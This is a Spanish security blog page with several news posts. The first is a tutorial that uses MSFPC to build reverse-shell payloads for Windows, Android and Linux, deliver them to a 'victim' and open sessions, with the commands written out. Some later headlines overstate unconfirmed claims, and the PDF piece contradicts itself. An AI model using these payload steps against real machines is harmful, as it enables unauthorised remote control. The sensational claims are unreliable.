sábado, 25 de julio de 2020

GENERAR PAYLOADS PARA ANDROID, WINDOWS Y LINUX EN UN MINUTO

INTRODUCCIÓN

MSFvenom Payload Creator (MSFPC) es una herramienta para la creación de cargas útiles (payloads). MSFPC puede generar diferentes cargas de Windows, Android o Linux en un minuto. Es una manera fácil de generar cargas útiles de Meterpreter usando MSFvenom (parte del marco Metasploit). Esta herramienta facilita su uso para crear una carga útil y explotar la máquina de la víctima. MSFPC puede identificar automáticamente la interfaz, la dirección IP, etc. Investigadores en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS) han demostrado muchas otras cargas útiles que son completamente indetectables. Este MSFPC es una herramienta preinstalada en Kali Linux.

ENTORNO

  • SO: Kali Linux 2020 64bit
  • Versión de Kernel: 5.6.0

PASOS DE EJECUCION

  • Use el comando msfpc -h para encontrar la opción de ayuda
MSFPC - Help Fig 1

MSFPC - Help Fig 2

GENERAR CARGA DE WINDOWS

  • Ahora use el comando msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) para generar la carga útil
  • Use el comando msfpc windows 192.168.0.51 4444 para ejecutar
MSFPC - Windows Payload
  • Ahora, abra la otra terminal y ejecute el comando msfconsole -q -r ‘/home/iicybersecurity/windows-meterpreter-staged-reverse-tcp-4444-exe.rc’ para iniciar el controlador
MSFPC - Windows Handler
  • Para las pruebas, envíe este archivo exe malicioso generado a la víctima
MSFPC - Windows Malicious EXE file
  • Si la víctima ejecuta el archivo exe, podemos acceder a la máquina comprometida
MSFPC - Exploited Windows machine
  • Con éxito obtuvimos la sesión y podemos acceder a las máquinas de la víctima

GENERAR CARGA DE ANDROID

  • Ahora, explotemos el teléfono Android usando MSFPC.
  • Cree un archivo apk utilizando el comando msfpc apk 192.168.0.51 5555
MSFPC - Android APK
  • Se creó con éxito la carga útil
  • A continuación, inicie el controlador con el siguiente comando
  • msfconsole -q -r ‘/home/iicybersecurity/android-meterpreter-stageless-reverse-tcp-5555-apk.rc’
MSFPC - APK Handler
  • Ahora envíe el archivo apk a la víctima. Si la víctima instala el archivo apk, en su móvil
MSFPC - APK File
  • En las máquinas hackers se abrirá sesión
MSFPC - Exploited Victim's Phone
  • Con éxito podemos acceder a las víctimas móviles

GENERAR CARGA DE LINUX

  • Ahora explotemos la máquina Linux usando MSFPC
  • Use el comando msfpc bash 192.168.0.51 2222 para explotar la máquina Linux
MSFPC - Linux Payload
  • Creó con éxito la carga útil
  • Luego use el comando -q -r ‘/home/iicybersecurity/bash-shell-staged-reverse-tcp-2222-sh.rc’ para iniciar el controlador
MSFPC - Linux Handler
  • Ahora, envíe el archivo malicioso a la víctima
  • Si la víctima ejecuta estos comandos en la máquina
    • Chmod +x bash-shell-staged-reverse-tcp-2222.sh
    • ./ bash-shell-staged-reverse-tcp-2222.sh
  • La sesión se iniciará automáticamente en la máquina del hacker
MSFPC - Exploited Linux Machine
  • Se explotó con éxito la máquina de Linux

CONCLUSIÓN

Como vimos, cómo crear carga útil y explotar Windows, Linux y Android usando MSFPC. Este MSFPC facilita el uso de los hackers y sin recordar los comandos.

El cargo GENERAR PAYLOADS PARA ANDROID, WINDOWS Y LINUX EN UN MINUTO apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.



Ver Fuente

viernes, 24 de julio de 2020

Este hombre lavó $25 millones vía cajeros automáticos de Bitcoin. ¿Cómo lo hizo?

Un residente del Condado de Orange, California, admitió haber lavado alrededor de $25 millones de dólares usando una red de cajeros automáticos de Bitcoin sin licencia, reportan expertos en seguridad lógica. Kais Mohammad reconoció estar al tanto de que muchos de sus clientes usaban estos cajeros de criptomoneda para blanquear activos obtenidos ilícitamente.

El individuo de 36 años se declaró culpable de un cargo de operación de transmisión de dinero sin licencia, un cargo de lavado de dinero y un cargo más por incumplimiento de un programa contra el crimen organizado.

Acorde a los expertos lógica, Mohammad era el principal operador de Herocoin, una red ATM para transacciones de Bitcoin, tarea que realizó entre 2014 y 2019; además, el acusado también realizó múltiples transacciones mediante la plataforma LocalBitcoins empleando un pseudónimo. El acusado cambiaba Bitcoin por efectivo empleando un tipo de cambio alrededor de 25% más alto que el promedio actual, mencionan las autoridades. La cuenta de Twitter de Herocoin confirma el señalamiento de los fiscales.

Hace unos meses las autoridades presionaron al acusado para registrar Herocoin ante la Red de Ejecución de Delitos Financieros (FinCEN), tal como estipula la ley americana. Mohammad trató de completar el proceso, aunque FinCEN concluyó que esta red de cajeros Bitcoin no cumplía con sus regulaciones; la ley en E.U. también exige a las compañías notificar las transacciones que rebasan un monto específico, cosa que Mohammad tampoco cumplió.

En septiembre de 2018, los investigadores federales encubiertos compraron $14 mil dólares en Bitcoin de un cajero propiedad de Herocoin; los agentes repitieron esta actividad con frecuencia, para asegurarse de que el acusado no cumplía con las leyes anti lavado de dinero, mencionan los expertos en seguridad lógica. Finalmente, el Departamento de Justicia (DOJ) inició un proceso en su contra.

Mohammad admitió haber cambiado cerca de $25 millones durante la operación de los cajeros automáticos Herocoin y en su cuenta de LocalBitcoins. El acusado también admitió que no solicitaba a sus clientes el menor detalle sobre la obtención de sus activos, agregando que algunos de los implicados mantenían perfiles activos en foros de hacking en dark web.

El Instituto Internacional de Seguridad Cibernética (IICS) menciona que, como parte de la sentencia, al acusado se le confiscaron los  cajeros automáticos de Bitcoin, una cantidad no revelada de dinero y múltiples direcciones de criptomoneda. Mohammad enfrenta una sentencia de hasta 30 años en prisión.

El cargo Este hombre lavó $25 millones vía cajeros automáticos de Bitcoin. ¿Cómo lo hizo? apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.



Ver Fuente

Aplicación DJI GO 4 está espiando a millones de propietarios de drones como TikTok

Un par de equipos de expertos en ingeniería inversa de software ha revelado la existencia de múltiples problemas en la aplicación de Android para controlar drones desarrollada por el fabricante chino Da Jiang Innovations (DJI). Al parecer, la explotación de estas fallas puede emplearse para esquivar los controles de Google Play Store e instalar contenido malicioso, además de extraer información confidencial para enviarla a los servidores de la compañía. 

Los informes, presentados por las firmas Synacktiv y GRIMM, mencionan que la app Go 4 solicita permisos demasiado invasivos y recopila datos personales como IMSI, IMEI y número de tarjeta SIM. Además, la app contiene código contra la depuración y el cifrado, lo que impide un adecuado análisis de seguridad, de modo similar a los servidores C&C en ataques de malware.

“Gracias a los elevados permisos que solicita su app, la compañía tiene control casi completo de los dispositivos afectados”, mencionan los expertos en ingeniería inversa de software. Cabe mencionar que estas características inseguras no están presentes en la versión de esta app para sistemas iOS.

Por otra parte, el segundo reporte menciona que, después de aplicar ingeniería inversa a la app, se descubrió la existencia de una URL (hxxps: //service-adhoc.dji.com/app/upgrade/public/check) empleada para descargar una actualización que permite instalar aplicaciones no autorizadas. 

En la actualización, los expertos modificaron esta solicitud para activar una actualización forzada de una aplicación arbitraria, lo que permite la instalación de aplicaciones no confiables, para posteriormente bloquear el uso de la aplicación hasta que la actualización sea instalada.

Esto no solo es un incumplimiento de las políticas de Google Play Store, sino que además implica severos problemas de seguridad, pues los actores de amenazas podrían comprometer los servicios de actualización para instalar malware en los dispositivos afectados.

Además de esto, los expertos en ingeniería inversa de software descubrieron que la aplicación aprovecha MobTech SDK para pasar metadatos sobre el teléfono, incluido el tamaño de la pantalla, el brillo, la dirección WLAN, la dirección MAC, los BSSID, las direcciones Bluetooth, entre otros.

DJI es el mayor fabricante mundial de drones comerciales y se ha enfrentado a un estricto escrutinio del Departamento del Interior de E.U., en conjunto con otras compañías tecnológicas chinas. Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática, se recomienda ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Aplicación DJI GO 4 está espiando a millones de propietarios de drones como TikTok apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.



Ver Fuente

jueves, 23 de julio de 2020

Policía alemana puede ver los mensajes de WhatsApp de cualquier usuario en cualquier momento, medios alemanes reportan

De nueva cuenta la seguridad de WhatsApp está siendo cuestionada. Especialistas en cómputo forense mencionan que la Agencia Criminal Federal de Alemania (BKA) ha podido acceder a los mensajes en la plataforma, protegidos con cifrado de extremo a extremo. Los reportes, emitidos por fuentes anónimas para la plataforma Regard News, aseguran que las autoridades no requieren del uso de malware, por lo que habrían encontrado una forma para evadir el cifrado que protege los chats.

Cabe recordar que WhatsApp es la aplicación de mensajería instantánea más popular del mundo, con más de mil millones de usuarios activos en todo el mundo. Además, expertos en cómputo forense mencionan que el cifrado de extremo a extremo hace imposible que un tercero pueda acceder a la conversación entre dos usuarios.

Por el momento los informantes no han agregado más detalles, salvo que el hack es posible gracias al uso de WhatsApp Web, la versión de la plataforma para equipos de escritorio, no obstante, algunos expertos creen que podría tratarse de algo mucho más simple de lo que aparenta. Al respecto, un representante de la agencia federal sólo agregó que “las autoridades alemanas no pueden compartir con el público detalles sensibles sobre sus métodos de investigación criminal”.

Una de las fuentes menciona que la agencia federal ha estado explotando esta falla en WhatsApp Web prácticamente desde su lanzamiento, cuando fue utilizada en el ataque terrorista de “Christmas Market”. Los expertos en cómputo forense mencionan que, en caso de ser reales los reportes, esta actividad ni siquiera es considerada ilegal por las autoridades en Alemania, puesto que sus leyes permiten rastrear a los sospechosos de crímenes graves mediante sus telecomunicaciones.

En caso de confirmarse que el gobierno alemán es capaz de evitar el cifrado de extremo a extremo, WhatsApp sufriría un golpe catastrófico, pues esta medida es promocionada como uno de los más avanzados mecanismos de protección de la información y sólo es posible romper su seguridad con malware espía altamente sofisticado y sólo al alcance de grupos terroristas o potencias mundiales.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática, se recomienda ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Policía alemana puede ver los mensajes de WhatsApp de cualquier usuario en cualquier momento, medios alemanes reportan apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.



Ver Fuente

Ver estas series pirateadas de Netflix y Amazon Prime infectará su dispositivo con virus

La búsqueda de contenido pirateado en línea es una práctica común, aunque muy peligrosa, mencionan expertos de un curso para hackear celulares. Cifras recientes señalan que el streaming es el sector de la industria del entretenimiento con mayor crecimiento en los últimos años, ofreciendo gran cantidad de contenido a los usuarios interesados, aunque las compañías que brindan estos servicios no están a salvo de la piratería, lo que también expone a los usuarios que no desean invertir dinero para acceder a plataformas como Netflix o Amazon Prime Video.

Un estudio elaborado por SecureList ha revelado que los usuarios se exponen a infecciones de malware, campañas de seguridad intrusivas o robo de información al tratar de acceder de forma ilegítima a alguna plataforma de streaming (vía APKs no oficiales o páginas web inseguras que ofrecen crear cuentas con pruebas gratuitas permanentes o acceso al contenido pirateado). En la mayoría de los casos, estas fuentes de acceso contienen programas maliciosos, como troyanos bancarios o backdoors.

Acorde a los expertos del curso para hackear celulares, los actores de amenazas tienden a agrupar estas variantes de software malicioso con archivos que contienen los nombres de las películas, series o documentales más buscados actualmente. Este problema se pone peor al tratarse de contenido creado por plataformas de streaming, ya que en sus catálogos se encuentra una gran cantidad de títulos originales y exclusivos, por lo que llaman la atención del usuario con mayor facilidad.

Entre los títulos más relacionados con infecciones de malware se encuentran:

Netflix:

  • Sex Education
  • Ozark
  • Stranger Things
  • The Witcher
  • Love is Blind
  • BoJack Horseman
  • Orange is the New Black
  • Tiger King

Amazon Prime Video:

  • Catastrophe
  • Fleabag
  • Transparent
  • Bosch
  • The Expanse
  • The Marvelous Mrs. Maisel
  • The Man in the High Castle

Considerando que Netflix y Amazon Prime Video son las plataformas de streaming más populares del mundo, el alcance de campañas maliciosas para infectar a los usuarios que buscan contenido de forma insegura se extiende a millones de personas en decenas de países.

Otro factor que contribuye al incremento de esta práctica criminal es el lanzamiento de Disney+, la plataforma de streaming propiedad del gigante de los medios que ya está disponible en algunos países. Muchas series y películas muy populares pronto sólo estarán disponibles en Disney+, lo que seguro incrementará el riesgo de infección al buscar contenido pirateado, señalan los expertos del curso para hackear celulares.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática, se recomienda ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Ver estas series pirateadas de Netflix y Amazon Prime infectará su dispositivo con virus apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.



Ver Fuente

Firma digital en archivos PDF con Adobe, Perfect PDF, Foxit, Nitro o Libre Office PDF no es segura

A pesar de que las firmas digitales en software o archivos son un indicador de confianza, es posible que los actores de amenazas logren esquivar esta medida de seguridad, mencionan expertos en ingeniería inversa de software. Un reciente estudio elaborado por investigadores de la Ruhr-University Bochum, en Alemania, ha revelado que 15 de los 28 lectores PDF más populares son vulnerables a un ataque que permite a los hackers modificar el contenido de un documento PDF con firma digital.

Este método, bautizado como “Shadow Attack”, consiste en la explotación de las “capas de vista”, que se refiere a los diversos conjuntos de contenido agregados encima de otros elementos dentro de un documento PDF. Para esto, los actores de amenazas deben crear documentos con múltiples capas y enviarlo al usuario objetivo, quien deberá agregar la firma digital con una capa benigna por encima del contenido malicioso.

FUENTE: Ruhr-University Bochum

Alterar el orden de las capas de vista no modifica la firma digital, mencionan los expertos en ingeniería inversa de software, por lo que los hackers podrán usar el documento malicioso como si fuese un archivo legítimo. En otras palabras, un atacante podría modificar un documento PDF para agregarse como destinatario de una transacción bancaria, otorgarse la propiedad de inmuebles, entre otros escenarios.   

Los investigadores encontraron tres variantes del ataque:

  • Un hacker puede usar la función de Actualización Incremental del estándar PDF y ocultar una capa sin necesidad de reemplazarla con otra
  • Los atacantes también pueden usar la función Formularios Interactivos para reemplazar el contenido original
  • Una tercera variante consiste en la combinación de los ataques anteriores; los hackers usan un segundo documento PDF, reemplazando el contenido original con las funciones mencionadas

En su reporte, los investigadores que esta última variante es la más peligrosa, pues es posible reemplazar el contenido completo del documento, salvo la firma digital: “Los actores de amenazas pueden crear un documento completo que influya en la presentación de cada página, o incluso en el número total de páginas, así como en cada objeto que contenga”.

Por otra parte, especialistas en ingeniería inversa de software mencionan que esta variante de ataque es posible debido a que los archivos PDF permiten que objetos no utilizados estén presentes en su contenido, incluso cuando existe una firma digital. Cabe mencionar que las aplicaciones de visor PDF no son afectadas por este ataque, pues eliminan los objetos no utilizados por defecto.   

Esta variante de ataque es realmente peligrosa, aunque no todo son malas noticias. Los fabricantes de aplicaciones PDF ya han sido notificados sobre este nuevo vector de ataque, por lo que es cuestión de días para que las correcciones estén listas para su instalación.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática, se recomienda ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Firma digital en archivos PDF con Adobe, Perfect PDF, Foxit, Nitro o Libre Office PDF no es segura apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.



Ver Fuente

Airbnb estafa a sus usuarios al pedir que donen dinero a la plataforma por el COVID-19

La pandemia sigue generando múltiples problemas de seguridad en línea. Especialistas en seguridad lógica aseguran que una de las compañías más afectadas por el aislamiento es Airbnb, pues sus ganancias se desplomaron a la vez que los gobiernos de todo el mundo imponían restricciones a las actividades turísticas y de esparcimiento.

Para mitigar un poco el impacto económico de la crisis sanitaria, la plataforma de alojamiento anunció el lanzamiento de un programa de donaciones mediante el cual sus usuarios podían ayudar a mantener las operaciones de Airbnb.   

Aunque algunas compañías emergentes y establecimientos comerciales (bares, foros, centros nocturnos) han implementado estas campañas con éxito, la propuesta de Airbnb fue recibida de la peor manera posible, incluso algunos usuarios han acusado a la plataforma de intento de estafa, provocando enojo, pérdida de clientes y socios, además de amenazas de iniciar procesos legales, mencionan expertos en seguridad lógica.

Después de revelar el nivel de pérdidas económicas generadas por el coronavirus, los operadores de Airbnb comenzaron a pedir a sus usuarios que enviaran “tarjetas de bondad”, un medio para la emisión de donaciones en efectivo, alegando que sería prácticamente imposible mantener sus operaciones su situación financiera no mejoraba, pues miles de anfitriones que colaboran con la firma comenzaron a abandonar la plataforma.

En declaraciones para Bussiness Insider, un portavoz de Airbnb aseguró que el 100% de los ingresos obtenido mediante esta campaña serían para beneficio de los anfitriones de la plataforma: “Con el fin de evitar la pérdida de más socios, habilitamos una nueva función que permite a los usuarios enviar tarjetas virtuales con mensajes de apoyo para nuestros anfitriones; si lo desean, los usuarios también pueden enviar una contribución económica”.

Como se menciona en párrafos anteriores, la propuesta no fue bien recibida por los usuarios de Airbnb o el público en general, principalmente debido a que la crisis económica afecta a todas las personas por igual, por lo que es poco probable que los usuarios decidan enviar su propio dinero para salvar a la compañía.  

La empresa ya recibió cientos de quejas de los anfitriones, mencionan expertos en seguridad lógica. El principal argumento es que la firma ha implementado severas políticas de cancelación desde el inicio de la pandemia, lo que no solo limitó sus ganancias, sino que generó pérdidas considerables. Los usuarios también han mostrado su inconformidad, pues creen que la firma aumentará considerablemente sus tarifas cuando se relajen las medidas de confinamiento.

Hace un par de meses, la compañía anunció que emplearía más de 250 millones de dólares para que los anfitriones recuperaran el dinero perdido, aunque este plan no ha sido implementado aún.

El cargo Airbnb estafa a sus usuarios al pedir que donen dinero a la plataforma por el COVID-19 apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.



Ver Fuente